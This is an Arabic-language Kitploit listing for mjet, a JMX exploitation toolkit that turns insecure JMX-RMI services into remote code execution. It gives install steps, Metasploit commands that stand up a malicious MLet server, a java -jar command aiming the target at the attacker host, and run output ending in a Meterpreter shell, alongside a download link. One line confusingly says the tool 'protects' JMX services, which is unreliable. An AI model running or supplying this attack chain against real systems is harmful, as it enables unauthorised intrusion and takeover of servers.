Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mogwaisec/mjet
أطر الاستغلالتوليد الحمولةالاستغلالاختبار الاختراقسوء التكوينالفريق الأحمر
GitHubmogwaisec/mjet

mjet

مجموعة أدوات استغلال Java Management Extensions (JMX) من Mogwai

عرض المستودع
174315منذ 10 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

mjet

مجموعة أدوات Mogwai Security لاستغلال امتدادات إدارة Java (JMX)

mjet هي أداة يمكن استخدامها لحماية خدمات JMX ذات الإعدادات غير الآمنة. وهي مبنية على مقالة "Exploiting JMX-RMI" بقلم Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi" ويمكن استخدامها لتنفيذ حمولات Metasploit عشوائية على النظام المستهدف.

كان من المخطط أصلاً أن تكون mjet مجموعة أدوات هجومية متكاملة، ومع ذلك لاحظنا أن مستودع Metasploit على github يحتوي على طلب سحب (pull request) من شأنه توفير دعم أساسي لـ Java RMI/التسلسل (serialization) بلغة روبي الأصلية. هذا أمر رائع ويزيل الاعتماد على Java. لذا توقفنا عن تطوير هذه الأداة وسننشئ وحدات Metasploit في المستقبل القريب.

تتكون mjet من الأجزاء التالية:

  • وحدة Metasploit تحاكي "mlet Server". وهي في الأساس خادم ويب يستضيف ملف HTML يحتوي على وسم mlet
  • كائن مُدار (ManagedBean) يتم تغييره بواسطة وحدة خادم mlet ليتضمن الحمولة المحددة
  • أرشيف jar يُستخدم للاتصال بخدمة JMX غير الآمنة.

التثبيت (باستخدام إصدار github من Metasploit)

  • انسخ مجلد "MBean" إلى "data/java/metasploit"
  • انسخ java_mlet_server.rb إلى "modules/exploits/multi/misc/"

الاستخدام

يستخدم المثال الأنظمة التالية: المهاجم: 192.168.178.1 الهدف: 192.168.178.200، خدمة JMX تعمل على منفذ TCP 1616

  • قم بتكوين/بدء وحدة Metasploit "java_mlet_server". ستعمل الوحدة كمهمة خلفية
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

استخدم mjet.jar للاتصال بخدمة JMX المعرضة للخطر ووفّر عنوان URL إلى خادم الويب MLet...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

واستمتع بصدفة Meterpreter الخاصة بك :-)

تنزيل الأداة